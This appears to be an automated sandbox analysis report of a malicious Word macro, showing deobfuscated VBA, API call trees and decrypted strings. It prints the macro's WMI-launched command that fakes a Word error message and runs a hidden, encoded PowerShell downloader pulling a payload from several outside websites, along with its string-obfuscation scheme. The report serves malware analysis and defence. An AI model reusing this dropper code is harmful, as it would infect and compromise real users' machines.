]anw[3BS]anw[3AC]anw[3cA]anw[3LA]anw[3An]anw[3AH]anw[3MA]anw[3WQ]anw[3Bz]anw[3AH]anw[3QA]anw[3Jw]anw[3As]anw[3AC]anw[3cA]anw[3VA]anw[3BN]anw[3AG]anw[3EA]anw[3Tg]anw[3BB]anw[3AE]anw[3cA]anw[3ZQ]anw[3By]anw[3AC]anw[3cA]anw[3LA]anw[3An]anw[3AE]anw[34A]anw[3Jw]anw[3As]anw[3AC]anw[3cA]anw[3RQ]anw[3An]anw[3AC]anw[3wA]anw[3Jw]anw[3BJ]anw[3AC]anw[3cA]anw[3LA]anw[3An]anw[3AH]anw[3YA]anw[3SQ]anw[3Bj]anw[3AE]anw[3UA]anw[3UA]anw[3Bv]anw[3AC]anw[3cA]anw[3KQ]anw[3Ap]anw[3AD]anw[3sA]anw[3JA]anw[3BF]anw[3AH]anw[3IA]anw[3cg]anw[3Bv]anw[3AH]anw[3IA]anw[3QQ]anw[3Bj]anw[3AH]anw[3QA]anw[3aQ]anw[3Bv]anw[3AG]anw[34A]anw[3UA]anw[3By]anw[3AG]anw[3UA]anw[3Zg]anw[3Bl]anw[3AH]anw[3IA]anw[3ZQ]anw[3Bu]anw[3AG]anw[3MA]anw[3ZQ]anw[3Ag]anw[3AD]anw[30A]anw[3IA]anw[3Ao]anw[3AC]anw[3cA]anw[3Uw]anw[3Bp]anw[3AC]anw[3cA]anw[3Kw]anw[3Ao]anw[3AC]anw[3cA]anw[3bA]anw[3Bl]anw[3AC]anw[3cA]anw[3Kw]anw[3An]anw[3AG]anw[34A]anw[3Jw]anw[3Ap]anw[3AC]anw[3sA]anw[3KA]anw[3An]anw[3AH]anw[3QA]anw[3Jw]anw[3Ar]anw[3AC]anw[3cA]anw[3bA]anw[3B5]anw[3AE]anw[3MA]anw[3Jw]anw[3Ap]anw[3AC]anw[3sA]anw[3KA]anw[3An]anw[3AG]anw[38A]anw[3Jw]anw[3Ar]anw[3AC]anw[3cA]anw[3bg]anw[3B0]anw[3AC]anw[3cA]anw[3KQ]anw[3Ar]anw[3AC]anw[3gA]anw[3Jw]anw[3Bp]anw[3AC]anw[3cA]anw[3Kw]anw[3An]anw[3AG]anw[34A]anw[3dQ]anw[3Bl]anw[3AC]anw[3cA]anw[3KQ]anw[3Ap]anw[3AD]anw[3sA]anw[3JA]anw[3BI]anw[3AG]anw[3MA]anw[3Ng]anw[3Bj]anw[3AD]anw[3YA]anw[3dQ]anw[3B5]anw[3AD]anw[30A]anw[3JA]anw[3BJ]anw[3AD]anw[3cA]anw[3N) -> 21593 executed
135	Goto JADCpjk
136	Dim rEeiBJ as Object
137	Set jPnRGLC = waSbS	waSbS
138	Set rEeiBJ = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
139	Dim JADCpjk as Object
140	Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")	CreateTextFile
141	JADCpjk.WriteLine "bOOXnOJYtbRAbm"	WriteLine
142	JADCpjk.WriteLine "eSpcpGDZncccrFb"	WriteLine
143	JADCpjk.WriteLine "fUwLgjVtQyH"	WriteLine
144	Set VusSK = QrVtQr	QrVtQr
145	JADCpjk.Close	Close
146	Set rEeiBJ = Nothing
147	Set CbMZSLFAM = MfgnKGWI	MfgnKGWI
148	Set JADCpjk = Nothing
148	JADCpjk:
150	Goto eUdbDAHHs
151	Dim DyjPBI as Object
152	Set CksLJVJ = yUWxTlVAC	yUWxTlVAC
153	Set DyjPBI = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
154	Dim eUdbDAHHs as Object
155	Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")	CreateTextFile
156	eUdbDAHHs.WriteLine "OTLmJCwhyQMFzlB"	WriteLine
157	eUdbDAHHs.WriteLine "TthascRlxHZH"	WriteLine
158	eUdbDAHHs.WriteLine "frvvJFHIkftmZHE"	WriteLine
159	Set NBjEFGnEA = IYKcgC	IYKcgC
160	eUdbDAHHs.Close	Close
161	Set DyjPBI = Nothing
162	Set ORIzFDySE = ThHBBDu	ThHBBDu
163	Set eUdbDAHHs = Nothing
163	eUdbDAHHs:
165	Zpeehqbjjey.Create Bp63ahh3hb4hyq(Tz4pisa96444x1), Rua2q5h93ydvt, Ijq0g4n16u9apwecr	SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQB,,) -> 0 Rua2q5h93ydvt Ijq0g4n16u9apwecr executed
166	Goto njKwJdA
167	Dim XwZxsHCGt as Object
168	Set aLGptGA = QEIFFM	QEIFFM
169	Set XwZxsHCGt = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
170	Dim njKwJdA as Object
171	Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")	CreateTextFile
172	njKwJdA.WriteLine "BQumCJmmiAGIKv"	WriteLine
173	njKwJdA.WriteLine "HiTyACJmCuGQFFJ"	WriteLine
174	njKwJdA.WriteLine "TJahKRWdrvHFIy"	WriteLine
175	Set NFWzF = rJqMZII	rJqMZII
176	njKwJdA.Close	Close
177	Set XwZxsHCGt = Nothing
178	Set xNJyUCNg = JHrNWdBsW	JHrNWdBsW
179	Set njKwJdA = Nothing
179	njKwJdA:
181	Goto PmBxcD
182	Dim rgBSB as Object
183	Set VAEDpBCV = PGiog	PGiog
184	Set rgBSB = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
185	Dim PmBxcD as Object
186	Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")	CreateTextFile
187	PmBxcD.WriteLine "HwixyOCYxmojd"	WriteLine
188	PmBxcD.WriteLine "xtsHGQjpNzDIYJ"	WriteLine
189	PmBxcD.WriteLine "koDuGqAOJBlLgZIEme"	WriteLine
190	Set TxAVq = NSiRQzd	NSiRQzd
191	PmBxcD.Close	Close
192	Set rgBSB = Nothing
193	Set aTfPCap = txKQv	txKQv
194	Set PmBxcD = Nothing
194	PmBxcD:
196	End Function

Function Bp63ahh3hb4hyq, APIs: 201, Strings: 20, Number of lines: 66, Relevance: 388.566

APIs	Meta Information
rtGyqOth
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
wUoJIFDD
Close
XKPUEfhk
xOnWA
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
kboRA
Close
wCjuwBBGN
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: Lz6ghzf8pxt17d
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: nIHrI
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: CreateObject
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: CreateTextFile
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: WriteLine
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: WriteLine
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: WriteLine
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: yJouG
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: Close
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: LVadAF
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: Replace
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: W06apxljciw_nbacx
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: fUDmDCt
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: CreateObject
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: CreateTextFile
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: WriteLine
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: WriteLine
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: WriteLine
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: ItSfCDCB
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: Close
Part of subcall function Y4o_ocvl0jti6oho0r@Oi5oelv0_s4: ilONFzHG
HOkLRDGd
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
eBddHTXP
Close
TFXNGIiH
lgZgGO
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
UMzHfyAfA
Close
zgBjJOGEH

Strings	Decrypted Strings
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"Oafyb:\RPNGMA\cmOgEyD.EEpGjE"
"rVpvDaGGxNfeNUF"
"dWnMFoTBPDqeJK"
"budRDJKVnJRU"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"pygNv:\znIpFIR\yniMs.nmiIGDEDA"
"bVawaPADALVlWFFA"
"lRcGHADAHrlHJJA"
"utFMeJhUKJhJ"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP"
"ozrZBTZBTMMIBB"
"uJnfBHIPFKBxHBmEE"
"ZRotGHIxyrpSqvsXCC"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE"
"PFQdBLHsDnfTZv"
"BWSOKPyHMnSQxi"
"cnLcFxEphoEbAFA"

Line	Instruction	Meta Information
197	Function Bp63ahh3hb4hyq(Tx84obagfrrh42q)
198	On Error Resume Next	executed
199	Goto oOysMtDG
200	Dim xCaTC as Object
201	Set RUMGE = rtGyqOth	rtGyqOth rtGyqOth rtGyqOth rtGyqOth rtGyqOth
202	Set xCaTC = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject CreateObject CreateObject CreateObject CreateObject
203	Dim oOysMtDG as Object
204	Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")	CreateTextFile CreateTextFile CreateTextFile CreateTextFile CreateTextFile
205	oOysMtDG.WriteLine "rVpvDaGGxNfeNUF"	WriteLine WriteLine WriteLine WriteLine WriteLine
